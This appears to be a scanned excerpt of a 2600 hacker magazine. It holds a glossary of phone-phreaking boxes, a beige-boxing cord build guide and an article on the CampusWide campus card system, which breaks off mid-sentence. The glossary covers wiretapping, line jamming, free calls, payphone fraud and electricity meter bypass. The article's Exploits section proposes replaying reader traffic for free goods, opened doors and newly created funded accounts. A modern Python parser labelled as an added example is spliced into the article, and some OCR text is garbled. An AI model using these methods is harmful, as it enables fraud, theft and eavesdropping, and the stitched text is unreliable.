In-Use Light Box. A device that signals whether or not an extension of a particular phone line is off-hook. It does not indicate whether or not a phone is being tapped, and will light whenever any extension is picked up. By The Night Owl AE.

Jack Box. A device to generate tones created starting from a phone keypad.

Jolly Box. Software written in 8086 assembly which generates several phone tones ("Multi-Frequenz-Demon-Dialer for Global Access"). Code by Jolly Roger. Updated by Zaphod Beeblebrox of Control Team. Date: probably 1993 or earlier.

(Light Box) (another name for the Charging Box). See Charging Box.

Loud Box. Makes your voice louder over the phone line. Especially meant for use in conference calls. Designed, written and built by Mr. Bill.

Lunch Box (aka Tap Box). The Lunch Box is a very simple transmitter used for eavesdropping. It is quite small and can easily be put in a number of places. Created by Dr. D-Code.

Magenta Box. When you call up line one from your house, you will get a dial tone almost immediately. Using DTMF, you can dial anywhere that the person who owns line two has service to. Which means you can direct dial Alliance, Australia, and your favorite BBS for free. Designed by Street Fighter.

Magenta Box (2). A portable ringing generator which, if connected to a phone line, will make the phone on the end of it ring. It works by using a relay as a vibrator to generate AC which is then stepped up by a transformer and fed through a capacitor into the phone line to make the phone ring.

Mauve Box. Generates a magnetic field to tap the nearest phone conversation (somehow similar to Tempest, the system to tap video screens). Created by Captain Generic with help from The Genetic Mishap. Date: November 24 1986 - 19:08.

Meeko Box. A multi-purpose box with the following features: It is able to record telephone conversations with excellent quality. It is able to play a source directly into the phone line. It can keep the phone line open. You can box without using a phone and headphones (requires a modem). Designed by Meeko of Hi-ReS UK. Year: 1994.

Mega Box. A cable rerouter to hook up a second line in your house.

Modu Box (aka Modula Box). A second phone plug attached to an existing one. Designed by Magnus Adept.

(Modula Box) (expanded name for the Modu Box). See Modu Box.

[Music Box] [similar to Pink Box (2)]. It's basically a Pink Box (2) without the LED. See Pink Box (2). Created by Aluminium Gerbul.

Mute Box. This box lets the user receive long distance calls without being detected.

Neon Box (aka Record-o-Box) (erroneously used as an alias for the Blast Box II) [similar to Sound Blaster Box, Rock Box, Slug Box]. A device that adds a normal jack interface to a telephone, allowing the sending of music or tones into the phone line, or the recording of conversations using the microphone input of a recorder. This kind of box can be commonly found in a phone shop.

Noise Box [similar to the Scarlet Box]. It is a device you can attach to a victim's phone line so that an abnormal amount of noise will be present on the line at all times, which would make data transmissions almost impossible and voice communications annoying, to say the least. By Doctor Dissector of Phortune 500.

(Obnoxious Box) (another name for the Chartreuse Box). See Chartreuse Box.

Olive Box. An alternative ring for your phone with a light that also flashes when the phone rings. By Arnold, sysop of Hobbit Hole AE (HHAE) East Branch.

(Opaque Box) (another name for the Brown Box). See Brown Box.

[Orange Box] [similar to Crimson Box, Green Box (2), Hold Box, Hold On Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

Paisley Box. A multipurpose box that combines the functions of several boxes, including blue, beige, and blotto. Among other things can seize operator lines and remotely control all TSPS and TOPS consoles. By Blade of the Neon I ■ tic ken Knights.

Pandora Box. A device that generates a high intensity sound to produce pain. A similar device (usually called "phasor") is commonly sold in security shops for personal defense. By Du Rat of Rat Labs, S.F., CA. Year: 1986.

[Party Box] [similar to Brown Box, Three Box, Con Box]. This box allows free Three-Way calling, connects two phone conversations at once, without any static or excess wiring, or even having two phone lines. Created by Greyhawke of The Dark Knights (TDK).

Pearl Box [similar to Pearl Box 2 - Advanced Pearl Box]. This is a box that may substitute for many boxes which produce tones in hertz. The Pearl Box when operated correctly can produce tones from 1-9999Hz. As you can see, 2600, 1633, 1336, and other crucial tones are obviously in its sound spectrum (yet you'd need two Pearl Boxes to generate combined tones, such as the ones of the dial pad). Created by Dr. D-Code. Year: before 1989.

[Pearl Box 2 - Advanced Pearl Box] [similar to Pearl Box]. A Pearl Box made in an easier and cheaper way. Created and Tested by Dispater. Date: July 1 1989.

Pink Box. Allows you to hook two separate phone lines together to have Three-Way calling with hold on either line, as well as bringing a dial tone into the conversation with someone and allowing them to dial the number with touch tones so it will connect Three-Way. When they hang up, it will disconnect Three-Way calling. No more need to play with the hook for Three-Way.

Pink Box (2) [similar to Music Box]. The function of a "Pink Box" is to add a hold button that allows music or anything else to be played into the telephone while the person is on hold. This modification can either be done right in the telephone or as a separate box. This kind of box can be commonly found in a phone shop.

Plaid Box. Turns a pulse phone line into a touch phone capable line.

(Portable Gray Box) (another name for the Gray Box). See Portable Silver Box.

Portable Silver Box (aka Portable Gray Box). A batteries-operated Silver Box that can fit in a pocket for use in payphones or wherever. By The Phone Phantom.

[Power Box] [similar to Tron Box]. The power box is a simple device that will allow you to completely bypass the meter-reading equipment of the power company. It works by connecting the power line running into your house directly instead of through the meter (which records electricity usage for the power company). When implemented correctly, there is no possible way that you can be detected by the power company and therefore save many hundreds of dollars through its use. Not a phreak box. Concept and Plans by Cursor. Date: August 9 1990.

Puce Box. This box emits vaporous LSD. Line noise may cause strychnine formation.

Purple Box. This box allows switching between two phone lines, putting one of them on hold. A LED shows which line is on hold. Created by The Flash. Date: February 26 1986.

Rainbow Box [non-selective version of the Bottle-Nosed Gray Box]. Connects the electric line to the phone line, blowing up everything. Odds are you will take out every phone in the neighborhood and get caught. By The Dolphin that came from Belmont.

Razz Box. This box allows you to tap your neighbor's line without your neighbor knowing it. You can also make free phone calls. Written by The Razz and released by The Magnet of Crime Ring International. Date: November 12 1988.

(Record-o-Box) (another name for the Neon Box). See Neon Box.

Red Box [similar to the Red Box Whistle]. The Red Box basically simulates the sounds of coins being dropped into the coin slot of a payphone. The traditional Red Box consists of a pair of Wien-bridge oscillators with the timing controlled by 555 timer chips.

[Red Box Whistle] [similar to the Red Box]. A phreak in the Midwest has extensively tested a method of red boxing which uses nothing more than a pair of brass or aluminum whistles. This method is very similar to the original blue boxing as it was discovered by Cap'n Crunch. Reported by The Researcher.

Red Green Box [combines a Red Box and a Green Box]. This is a device that generates the tones for red boxing and green boxing. By Pink Panther.

Ring/Busy Box. When connected to a phone line, this box will cause a busy signal anytime a call is made to that particular line. They can still use their phone to make outgoing calls. By MOrtaSkuld.

[Rock Box - Basic] [similar to the Rock Box - Advanced, Neon Box, Sound Blaster Box]. The Rock Box channels the music from the stereo out to the phone line via the headphone output. It also can record conversations. Created and designed by Video Vindicator of the Shadows of IGA.

[Rock Box - Advanced] [similar to the Rock Box - Basic, Neon Box, Sound Blaster Box]. The Rock Box channels the music from the stereo out to the phone line via the headphone output. It also can record conversations. The Advanced version has more complex wiring and better audio quality. Created and designed by Video Vindicator of the Shadows of IGA.

Sand Box. Usage unknown. Cited in the Crimson Box document. By Dr. D-Code. Year: 1985 or 1986.

[Scarlet Box] [similar to the Noise Box]. The purpose of a Scarlet Box is to create a very bad connection. It can be used to crash a BBS or just make life miserable for those you seek revenge upon. Written and created by The Pimp.

Servo Box. Uses R/C car servos to change lines in poles outside of house. This could be a nice idea, but very expensive and hard to do.

Silver Box (aka Gray Box) [similar to Solid State Silver Box]. The silver box transforms keys 3, 6, 9, # to special keys A, B, C, D.

[Slug Box] [similar to the Neon Box]. A slug box is a recording box that stops and starts the tape recorder when a connection is made. Date: May 14 1990, 10:18 pm.

Snow Box. An underground television transmitter built using commercially available parts. Not a phreak box. Date: June Id 1988.

Solid State Silver Box (can be shortened as SS Silver Box) [similar to Silver Box]. This box uses an integrated circuit to generate the tones rather than converting a phone keypad.

(SS Silver Box) (short name for the Solid State Silver Box). See Solid State Silver Box.

[Sound Blaster Box] [similar to Neon Box, Rock Box]. A device that adds a normal jack interface to a telephone, allowing the sending of music or tones into the phone line, or the recording of conversations using the microphone input of a recorder. Better than a Neon Box. By ShadowHawk. Date: March 31 1994.

Static Box. This box keeps the voltage regulated so that you can avoid static. This allows a more stable line for high speed modems (which at the time meant 2400bps). In a certain way it's the opposite of boxes like the Noise Box. Created by The Usurper and The Raver of the Lords of Twilight. Date: Originally released on November 21 1986. Second release on December 27 1987.

Switch Box. With the Switch Box you can put one or both phone lines on hold with visible indicators of each line's status, conference call with two people, change a phone from line 1 to line 2, and lastly, make one phone line physically dead to the outside world. By Autopsy Saw.

Sword Box. The sword box is just essentially a Bud/Beige/Day-Glo Box with enhancements and modifications. The structural differences in the Sword Box make it better however, and thus safer for you to use. By Grim Reaper/$TS. Date: November 22 1987.

Tan Box (it's not the short name of the Tangerine Box, which is a different box). It allows you to make recordings from a phone line, and it will only record once the victim's phone is picked up. It's like a Neon Box combined with a Beige Box.

Tan Box (2) (it's not the short name of the Tangerine Box, which is a different box). It serves as a phone ringer. You have two choices for ringers: a piezoelectric transducer (ringer) or a standard 8 ohm speaker.

(Tanger Box) (short name for the Tangerine Box). See Tangerine Box.

Tangerine Box (can be shortened as Tanger Box. Can't be shortened as Tan Box, which is a different box). Enables you to plug it in, then listen to the conversation, without them hearing a click or anything... plus a jack for headphone, or tape. By Happy Harley.

(Tap Box) (another name for the Lunch Box). See Lunch Box.

[Three Box] [similar to Brown Box, Party Box, Con Box]. Use one line, another line, or both. Like a Con Box, but better because it uses LEDs for which line you are on.

Tron Box [similar to Power Box]. It will put a reverse phase signal on the line and cancel out the other phase and put a reverse phase signal running everything in the house. It should make the electric meter run backwards. Not a phreak box. By Pure Evil.

Urine Box (aka Zap Box). It basically creates a capacitative disturbance between the ring and tip wires in another's telephone headset. By Wolfgang von Albatross of the Underground_Elite. Date: March 2 1986.

V-Box. Detect voltage changes in phone lines (used for taps).

Violet Box. This box allows calls to be made from payphones with just one coin, keeping the line from being released when time is up. The author was going to call this the "Yellow, Violet and Brown Box" but then decided that name was too long so he stuck to just violet because it sounded nice. By The Kez.

White Box. Turns a normal touch tone keypad into a portable unit. This kind of box can be commonly found in a phone shop.

[White Box (2)] [similar to Crimson Box, Green Box (2), Orange Box, Hold Box, Hold On Box, Yellow Box (2)]. A hold button. See Crimson Box.

White Gold Box. A White Box and a Gold Box combined. Created by The Traveler.

Yellow Box. This box can switch a payphone from working to out of order and vice versa. By Captain Hook. Date: February 3 1986 - 5:47.

[Yellow Box (2)] [similar to Crimson Box, Green Box (2), Orange Box, Hold Box, Hold On Box, White Box (2)]. A hold button. See Crimson Box.

(Zap Box) (another name for the Urine Box). See Urine Box. The scheme and description is the same as for the urine box, but it's attributed to another author. By KiLLg Ore fmu t [BUI ,gc ].


Over the years, we've managed to get a lot of corporations, agencies, and entire governments very angry at us for the things we print in the magazine or the web site. It's become difficult for us to keep track of all the legal threats we've gotten. So we decided to stick it all on a shirt so nobody would forget.

The front of the shirt is a graphical image of our continuing ride through the streets of Corporate America, constantly attracting the attention of enforcement agencies of all sorts. On the back you'll find a concert tour style listing of the various legal threats and lawsuits we've faced. Get yours soon before we have to add more threats and make the print smaller!

Order through our online store at store.2600.com or send $18 (US $22 overseas) to 2600, PO Box 752, Middle Island, NY 11953 USA. Indicate your size (L, XL, XXL).







by Captain B 

The principle and construction of this box is quite simple. You're modifying a phone handset cord for use as a line cord. All you will need for making this is a wire cutter (or wire cutter/stripper) and modular crimp tool. Radio Shack sells both, but you can also find the modular crimp tool at other places that sell phones and phone accessories. Radio Shack sells two different modular crimp tools. The only difference is that the cheaper one ($9.99) has no wire cutter and only crimps RJ11, 14, and 25 (one, two, and three line) modular plugs. The more expensive one ($29.99) has a built in wire cutter and also crimps plugs on RJ45 (four line) modular plugs. As long as you have a wire cutter, you don't need to drop $30 on the more expensive crimp tool.

It should be noted that some phone handset cords have four conductors inside, while others have two. But unless you're going to use a two line phone, the cord won't need to have more than two conductors. Take a phone handset cord and look first at the little wires in the plug to observe for the color scheme (thus making note of the correct polarity). Then cut off that handset cord plug. You could do both at once, but you might lose track of the correct polarity. To simplify, do one end of the cord at a time. Try to cut off the plug as close as possible to where it connects to the cord. Take a two line (RJ14) modular line cord plug and crimp it on the handset cord facing the same way as the previous handset cord was. (In other words, if the little spring clip on the handset cord was facing down, crimp the line cord plug on facing the same way as that was.) To crimp, first push the line cord plug over the end of the handset cord as mentioned, then insert that end of the handset cord into the modular crimp tool properly, and squeeze the handles together firmly until it stops (which is quite fast). See the instructions that came with the modular crimp tool if you need more help.

After crimping a line cord plug on one end of the handset cord, you have only to repeat the same process for the other end of the handset cord and you're done. If you messed up on the polarity at either end, it should still work, but keeping polarity correct is the right way. As long as you're careful, and work patiently, it's a piece of cake.

I think the bungee box is great for beige boxing purposes, because when phreaking out in the field, you don't want a tangled mess of line cord to have to disconnect and store away when you have to get out of the scene in a hurry. It should be mentioned that another way to accomplish this is to use a retractable line cord. It comes in its own circular case. These can be bought either from Radio Shack for $19.99 or Home Depot for about $15. The one from Radio Shack is 12 feet long, the one from Home Depot is 16 feet long (according to the packages). Have phun.

All credit for the name of this box goes to icOn of LPH.









At long last, our documentary film "Freedom Downtime" is available on videotape. This is the story of the Free Kevin movement, our trip across the United States to talk to people involved in the Kevin Mitnick affair, and our attempts to ... people behind a major motion picture ... spread lies about Kevin to moviegoers everywhere.

VHS NTSC format, 121 minutes. Order through our online store at store.2600.com or send $20 (US $23 overseas) to 2600, PO Box 752, Middle Island, NY 11953 USA.






by Acidus 

CampusWide is the most widely used card access system in America today. It sadly is the least secure. CampusWide is an ID card solution originally created by AT&T and now owned by Blackboard. It is an ID card that can be used to purchase things from vending/laundry machines or the college bookstore just like a debit card. It's used to check out books from libraries, open computer labs and buildings at night, gain access to parking decks, and even get you into sporting events. The CampusWide system gives everyone a card that lets them access both unattended and attended card readers and Points of Sale. All these actions and transactions are sent to a central server which stores all the information in a database. A confirm or deny signal is sent back to the card reader.

Back in the day (last ten years), there were two major card systems available to colleges: AT&T's CampusWide system (also known as Optim9000) and Icollege's Envision. Envision was one of the first card systems ever made. The seeds of the current Envision system go all the way back to 1984 with a company called Special Teams. The original engineers from Special Teams went through several companies, each one being bought by another company every year for several years, before they came to Icollege. AT&T saw the market for card systems and jumped into the mix as well, stealing some of the ideas behind the system by hiring developers of Envision away from Icollege. They released a system known as CampusWide. It is commonly called Optim9000 or OneCard, however I will continue to call it by its most well known name, CampusWide. So why do you need to know all this history? Because the core of all modern card systems is based entirely on 1984 technology! The original engineers from Special Team and people trained in their ideas have been the only people in the country designing and building these things. That means that the weaknesses in the reader/server infrastructure that I point out here are found in every card system made in the United States in the last 15 years! By the mid to late 90's CampusWide held the largest market share. Then in November 2000, a newly formed company called Blackboard purchased both Envision and CampusWide. It sells both systems under the names Envision and Optim9000. Blackboard's first order of business was to upgrade the two systems to use newer technology, only to learn that they couldn't! Too many colleges and even businesses had the older equipment and Blackboard couldn't afford to drop compatibility! They have tried to merge older and newer technology in an attempt to improve security (with the addition of IP converters), but in truth, they have weakened an already frail system.

The CampusWide system is the most prevalent, and easy to spot. The readers are black metal or plastic, almost all have an LCD screen, and they have no writing on them except for the AT&T logo with the word "AT&T" under it. The newer Blackboard ones work exactly the same as the AT&T ones, only they have Blackboard written on them. Information on the CampusWide system was very hard to find. I started looking right after AT&T sold it when they were clearing out their old web pages and Blackboard was still creating their web pages. Needless to say, AT&T had much better documentation of the specs of the system than Blackboard does. Sadly, all of it is off AT&T's page now and you'll have to hurry to still find it cached on Google. Luckily I saved everything, and should post it up soon.

The Server 

The CampusWide system is recommended to run on HP9000 machines, though any RISC processor will do. It only runs on HP-UX (Blackboard currently installs ver 11.x). The AT&T system had a list of specs that the end users had to have to support the software. These included the above, but also a four gig capacity Digital Audio Tape and a UPS that could keep the system up for 20 minutes (Blackboard's newer specs suggest a Best Ferrups 1.8 KVA battery that can go for 45 minutes). More interestingly, the CampusWide system is required to have a 9600 bps modem for remote diagnostics. The system itself consists of two parts: The Application Processor (AP) and the Network Processor (NP). The Application Processor is the back end of CampusWide, the part the users never see. It manages the database where all the information is stored and provides an interface for human operators to look at logs and run reports, as well as change configuration/privileges and transactions/account maintenance. The NP is the gateway from the infrastructure to the AP. It takes in the requests from readers around campus, converts the mode of communications into commands the AP can understand, and then passes it along. AT&T CampusWide could support up to 60 communication lines and 1000 card readers. The new Blackboard system allows up to 3072 readers.

The Database 

All the information about a student or
employee isn't stored on the card for security reasons,
it's stored in the database (the card simply has an
account number which is used to organize the data
in the database). The database used by the current
Blackboard system is dbVista. The database for the
AT&T version was never advertised by AT&T but
was believed to be Informix. However, based on
the modular design of CampusWide, I believe any
SQL queried relational database should work. The
database is most likely not encrypted or protected
in any way other than by isolation. The only way
to get to it is either at the console of the AP or by
the commands sent from card readers that have
already passed through the NP. Blackboard's
assumption that these two ways of reaching the AP
are secure is one of the system's downfalls. The
database can store up to 9,999 different accounts,
each account having many different fields. The
balance the person has and the doors he can open
are included in the system. The balance will be a
floating point number, and the doors the person
can open will most likely be a string of characters,
with the bits being used to tell which doors he can
or can't open. The doors are most likely grouped
into zones, so that the five doors into a building
have one bit instead of five separate bits saying
whether the person can open those doors or not.
This idea is upheld by the fact that Blackboard
says the users are given plans and they can be
updated regarding their access to buildings. These
plans grant different levels of security access to a
building. Lower levels can get into the building
through all the exits, the next level can access labs
on a certain floor, etc. Without direct inspection of
the database, only educated guesses can be made
about its structure. (I have totally left out any
provisions for checking out books and other things the
card can do.)

The Workstations 

The AP was interfaced originally by the AT&T
system only at the server console, or through dumb
terminals connected to 19,200 bps serial lines.
Toward the end of the AT&T days and now with
Blackboard, changes to someone's security
privileges can be made from any workstation on
campus. I watched this process several times. A certain
software package was used to connect through
TCP/IP to the AP. (I saw the name once, briefly,
and for some reason I thought it was Osiris.
Checking on this name has turned up no results.
Perhaps this is a proprietary piece of software
specific to my college, or simply a closely guarded
software package from Blackboard.) A GUI was
used to select my name from a list of students. A
summary of my security privileges then came up,
and the ability to add and remove these was there
as well. This GUI was incredibly user friendly, as
the man using it had nil computer knowledge. I
only got to watch a few people having new
security privileges activated, and never got to use it
myself, so I have no way of knowing if the debt
balance can be accessed/changed from this GUI.

The Card 

The ID cards that are used are your standard
ANSI CR-80 mag stripe cards. They are made of
PVC and are 2.125 by 3.375 inches. They are
made on site at the college's "card station," and
normally have a photo ID on them. A 300 dpi
photo printer is used and the company
recommended by Blackboard is Polaroid (just like the
printers at the DMV). The magnetic stripe on the
card is a Standard American Banker Association
(ABA) Track 2. Any card reader/capture tool can
read these cards. The cards are encoded on high
coercivity stripes (known as HiCo), which are
very resistant to wear and tear. These cards only
use Track 2 of the card which is read only. It is
interesting that they don't use Track 3 which is
read/write. Track 2's information breakdown is as
follows:

Start Sentinel = 1 character
Primary Account Number = up to 19 characters
Separator = 1 character
Country Code = 3 characters
Expiration Date or Separator = 1 or 4 characters
Junk data = fills the card up to 40 characters
LRC (Longitudinal Redundancy Check) = 1 character



As you can see, most of this applies to banks.
However, the account number I have stamped on
my CampusWide card is 16 characters long, so the
Primary Account Number field is known to be
used. CampusWide also allows for lost cards. If a
card is lost, an entry is made in that person's table
in the database, the last digit of the account
number is increased by one (this is called the check
digit - so of the 16 digit account number I have, the
first 15 digits are my number; the 16th digit is the
check digit). The old card that uses the old check
digit is deactivated and a new card is printed.
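The field list above, turned into a small parser. This is an added example, not code from the article or from Blackboard. The sentinel and separator characters and the 4-bit LRC arithmetic are taken from the ISO/IEC 7811 Track 2 character set as assumptions (the article gives only field lengths), and the sample account numbers are constructed.

```python
"""Added example: parse a decoded Track 2 string using the field list above."""

# Sentinel and separator characters come from the ISO/IEC 7811 Track 2
# character set (0x30-0x3F); the article only gives their lengths.
START_SENTINEL, SEPARATOR, END_SENTINEL = ";", "=", "?"
MAX_CHARS = 40            # total track capacity, as stated in the article
MAX_ACCOUNT_DIGITS = 19   # Primary Account Number limit from the article


def lrc(chars: str) -> str:
    """Longitudinal check character: XOR of the 4 data bits of every character."""
    acc = 0
    for ch in chars:
        acc ^= ord(ch) - 0x30
    return chr(0x30 + acc)


def parse_track2(raw: str) -> dict:
    """Validate framing, length and LRC, then split out the account fields."""
    if not 5 <= len(raw) <= MAX_CHARS:
        raise ValueError("track length out of range")
    if any(not 0x30 <= ord(ch) <= 0x3F for ch in raw):
        raise ValueError("character outside the Track 2 set")
    framed, check = raw[:-1], raw[-1]
    if framed[0] != START_SENTINEL or framed[-1] != END_SENTINEL:
        raise ValueError("missing start or end sentinel")
    if lrc(framed) != check:
        raise ValueError("LRC mismatch: read error or altered data")
    account, sep, rest = framed[1:-1].partition(SEPARATOR)
    if not sep:
        raise ValueError("missing field separator")
    if not (account.isdigit() and len(account) <= MAX_ACCOUNT_DIGITS):
        raise ValueError("bad primary account number")
    return {
        "account_number": account,
        # The article's reading of its own 16-digit card: the leading digits
        # identify the holder, the last digit is bumped when a card is replaced.
        "holder_id": account[:-1],
        "reissue_digit": account[-1],
        "remaining_fields": rest,  # country code / expiry / filler, not interpreted
    }


def build_track2(account: str, rest: str = "") -> str:
    """Frame constructed test data the same way, appending the LRC."""
    framed = START_SENTINEL + account + SEPARATOR + rest + END_SENTINEL
    return framed + lrc(framed)


def is_reissue_of(new_raw: str, old_raw: str) -> bool:
    """True when both tracks carry the same holder id and a different last digit."""
    new, old = parse_track2(new_raw), parse_track2(old_raw)
    return (new["holder_id"] == old["holder_id"]
            and new["reissue_digit"] != old["reissue_digit"])


# Constructed sample values, not real card data.
OLD_CARD = build_track2("1234567890123450", "0000")
NEW_CARD = build_track2("1234567890123451", "0000")
```

The LRC is an error check, not authentication: anyone can recompute it, so a passing LRC says the stripe was read cleanly and nothing about whether the account number is genuine.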

The Infrastructure 

The infrastructure is a "security through
obscurity" ploy of the system. Originally the system was
designed to run over several RS-485 drop lines.
(These are the 60 communication lines mentioned
before.) RS-485 is a very robust means of
transmitting data. (The whole CampusWide system is
designed to take a beating.) Unlike RS-232, which
has a protocol built into the standard that says how
devices must talk to each other (stop bits, baud,
handshaking, etc.), RS-485 has none of that. It is a
way for a master device that sits at the end of a
communication line to talk to slave devices that
are daisy chained on the line. The CampusWide
system uses the full duplex version of RS-485
where slaves can speak to the master before the
master polls them for data. (CampusWide needs
this to have the sub-second times they advertise.
However, the NP still polls all the readers on a
regular basis and can be interrupted by a reader when
a transaction comes in.) The data lines are very
robust against noise and interference. RS-485 has
two lines in each direction, called A and B. Data is
sent by having a difference in the voltage of A and
B of more than five volts. This means that if you
have a signal being sent and A is at 10 volts, B is at
15, and a power spike comes along, the spike will
boost both voltages by the power of the spike.
However, the difference between the higher power
A and B will still be five volts and the data is not
corrupted. Over short distances, speeds of 10Mbit
can be achieved. However, the longer the cable is,
the lower the speed. All CampusWide card readers
operate at 9600 bps, thus making the maximum
distance of the RS-485 drop line 4000 feet at that
speed. This can be extended through the use of
repeaters and boosters on the line. RS-485 is very
common in the industry, but "secure" at a college
since it is unlikely anyone would have a means of
interfacing to it. Commercial RS-485 to RS-232
converters are available and prices range from $50
to a few hundred. VHDL designs of these converters
can be found on the Internet, and thus an FPGA
could be configured to decode RS-485 signals.
While researching I came across a post from
someone claiming to be a field tech for some company.
He said that you could make an RS-485 to RS-232
converter very easily by wiring:

RS-232 Xmit = RS-485 RX
RS-232 Rcvd = RS-485 TX

No one posted after him to say he was wrong. I
don't know if it would work, since the second wire
of the pair of RS-485 data lines isn't even
mentioned, and it's the difference between these two
lines that sends the data. Also, the possibility of
high voltage on an RS-485 line could easily
damage a serial port on a computer, if not fry the
motherboard. Also, this assumes the data scheme used
to transmit data on the 485 line is identical to
RS-232. This doesn't have to be true, since the way
data is represented (in packets, streams, stop bits,
parity, etc.) is not defined by RS-485. If you could
get to the data streams, you have no idea what the
scheme used to represent it is, and thus how to
decode it. This last problem however, is moot, as you
will read in the Exploits section.

AT&T would recommend that these lines be
used (indeed all the readers can only transmit their
data in RS-485 mode), however the data can travel
over any facility from telephone lines to radio
waves, provided that full duplex 9600 bps
asynchronous communication can occur on them. The
NP is the part of the system that would sort all this
out. AT&T did however specifically say that using
an existing Ethernet or computer network was not
a good idea, as it sent the data out into the wild,
and would slow down both the CampusWide
system and the existing computer network. However,
Blackboard now offers an IP converter. This
device is a simple computer (it has a Pentium class
processor and a standard off the shelf NIC card)
that takes in 16 different RS-485 devices, converts
all their communications into TCP/IP packets, and
encrypts them to send over the network. The NP
then has a converter at its end that converts the
packet back to RS-485 format. The IP converter is
assigned an IP address which is most likely a static
address. The IP converter also most likely has a
daemon on it you can telnet into to look at the
status and perhaps change configuration info.
Blackboard says the data from these boxes is encrypted
and the box certainly has the power to crunch
some numbers. However, I have found that if
encryption is good, then companies will brag
about the key length, etc. The only data
Blackboard gives about the encryption is that the keys
can be changed automatically at any interval from
the AP.

For the longest time at my college if an
off-campus food joint wanted to have the student be
able to use their school cards to pay for food, they
had to pay for an expensive leased line that
connected them to the school. It's my guess that this
was the RS-485 line or something similar.
Recently (in the last six months) my college offered
cheap (less than $300) boxes to nearby pizza joints
that would allow for payment with a school card.
These boxes were simply card readers with
modems installed, much like a credit card
validator. These modems are dialing the NP directly!
Major security risk!

The infrastructure ends up like this. All the
devices in a building send their lines into one place in
the building. This is where multiplexers exist
which split the main RS-485 drop line up into
slices for each reader. These multiplexers also can
boost the power of the main drop line, letting it
travel longer distances. They can be stored in a
locked networking closet or in these big metal
cabinets on the wall of a room. AT&T called these
MW/MHWMKNC - Wall Mount Enclosures. This
metal box has a handle and a lock, but the front of
the handle and lock assembly has four flat head
screws. I used a cheap metal knife and opened this
locked box. Inside I found the LCM (Laundry
Center Multiplexer) that controlled the laundry
room I was in. Everything had "AT&T
CampusWide Access Solution" written on it, as well as
lots of Motorola chips. Sadly, this was early in my
investigation, and I haven't gone back to look
again.

The drop lines coming to the building can be
traced back all the way to the building that houses
the NP. There the NP interfaces with the AP to
approve or deny transactions.

The Readers 

Every reader imaginable is available to a
college from Blackboard. Laundry readers, vending
machine readers, Point of Sale (POS) terminals in
the campus bookstore, door readers, elevators,
copiers, football game attendance, everything!!!
All of the readers communicate using RS-485
lines, and if any other medium is used between the
reader and the NP (such as TCP/IP networking by
way of the IP converter), it must be converted back
to RS-485 at the NP, since all CampusWide uses
that standard. Everything is backwards
compatible. The majority of my college campus has AT&T
readers on them, though a few new Blackboard
readers are showing up.



Readers can be broken into three categories:
security, self vending, and POS.

Security readers are made of high density
plastic and consist of a vertical swipe slot and two
LEDs. They are green when they are not locked
and red when they are. When you swipe a card to
open a door you are cleared for, the light will
change to green for around 10 seconds. If the door
has not been opened in that time, it locks again. To
allow for handicapped people who may not be able
to get to the door in time, a proximity sensor is
available to receive signals from a key source to
open the door. Information about what frequencies
are used to control the door are obviously not
published by either AT&T or Blackboard. There is also
a model of door reader with both a swipe and a 0-9
keypad for codes. I have encountered no such
model and have no idea how it works. Advanced
forms of these three security readers are available
which have the ability to have a local database of
4,000 (expandable to 16,000) account numbers
stored in NVRAM. This way if for some reason
the card reader can't reach the NP to confirm
someone's identity, then the reader can check its
local records. The tricky bastards also built the
readers so there is no visible difference between a
reader that can't reach the NP and one that can.

The self vending machines are the most
colorful group. They are the best to hack because they
are unattended and work 24/7. They vary in size
and shape, but all have several fundamental
features. They all have an LCD screen of some kind,
the most common being 2x16 characters. Most are
mounted to walls and the power/data lines are
protected by metal conduit. Coke readers are mounted
on a Coke machine where the dollar bill acceptor
would go. Of this group one stands out: the Value
Transfer Station! Unlike the GUI at the
workstations, this reader can directly query about the
account balance of the cardholder and add money to
it as well (by feeding in dollar bills like a change
machine). In addition, it dispenses temporary PVC
cards that can be credited, so people can do
laundry, etc. if they forget their card. This means that
this station can tell the AP to create a new account
and give it x number of dollars!

Finally there are the POS devices. A student
would never get to use these, they are used in
cafeterias and bookstores. They allow for payment
by the student ID card and several other options.

All these readers have inherent similarities.
Most are made from high impact plastic or metal.
If it's wall mounted, there will be metal conduit
running out of the top which holds the power and
data lines. All have their program code on
ROM/NV-RAM chips. I once managed to power
down a card reader for a copier. When I turned it
back on, it ran through several self tests in the span
of a few seconds. I saw messages on the LCD that
said things like "ROM ver" and "CRC check
complete." AT&T and now Blackboard say all the
readers, including POS, will power up to full operating
status without any user input in a maximum of 20
seconds. All of these readers can store swipes of
cards and transactions in their local NV-RAM until
it can reach the NP, and through it, the AP to
confirm the transaction. While disconnected from the
NP, the readers show no warning lights or anything
like that. Some readers, such as the security
readers, can be wired to a UPS to keep areas secure
even when the power goes out.

A Simple Transaction 

Let's run through a simple transaction. I am at a
laundry reader. I tell the reader with a key pad
which washer I want to use. Let's say I choose C4.
I then swipe my card. The reader sends a signal
that contains the account number (and the amount
of my purchase and most likely nothing more) to
the NP through some medium (most likely it's a
straight RS-485 line, but an IP converter could be
installed by the university). The NP decodes the
data out of the RS-485 line and parses it into
commands the AP can understand. The AP uses the
account number to pull up my account and checks
the balance against the amount requested. It then
either deducts the money from my account and
tells the NP to send an OK signal, or to send a deny
signal along with the new balance of my account.
The NP forwards the reply back to the reader, and
the reader (if it got an OK signal) sends an
electronic pulse to the coin tester inside the washer C4
and tells it that $.50 was received. The washer is
retarded; for all it knows I put $.50 in it with coins,
and it gives me a load.

The Exploits 

Did you see the problem with the above
scenarios? There are several ways to cheat the system. If
I can record the "it's OK to sell it to him" signal
from the NP to the reader and play it to the reader
again, I will get another load of wash. Also, if I
could get to the wires that go from the Coke reader
to inside the Coke machine that send the coin
pulses, I can make the Coke machine think money
has been paid. I have looked at Coke machines
with these Coke readers. Out the back of them they
have an RJ11 jack (though it will have RS-485
signals on it). All I need is a converter and a laptop
and I can trap the signals back and forth between
the reader and the NP. You don't even need to
know what the data scheme used on the RS-485
line is, just send to the reader what you intercepted
from the NP and it will work. It is even easier if
the traffic takes place over a TCP/IP network. If I
learn the IP address of the IP converter, I can
simply send packets to it from anywhere in the world
(provided I can telnet into the college's TCP/IP
network) that contain the RS-485 code to spit out a
Coke! You can fool door readers as well if you can
get to the wires that go from the reader to the
magnet holding the door shut. Just send the correct
pulses. This system is horribly insecure because
you can completely bypass the CampusWide
interface. The Value Transfer Stations are even worse.
They have the ability to make the AP create a new
account and set a starting balance of any amount.
Just gain access to the RS-485 lines, record the
traffic to and from the NP while you are getting a
temporary card, and you have the system to create
and alter debt accounts.

With a system like this, you would think that
the RS-485 lines would be protected with massive
security. They aren't. Metal conduit protecting the
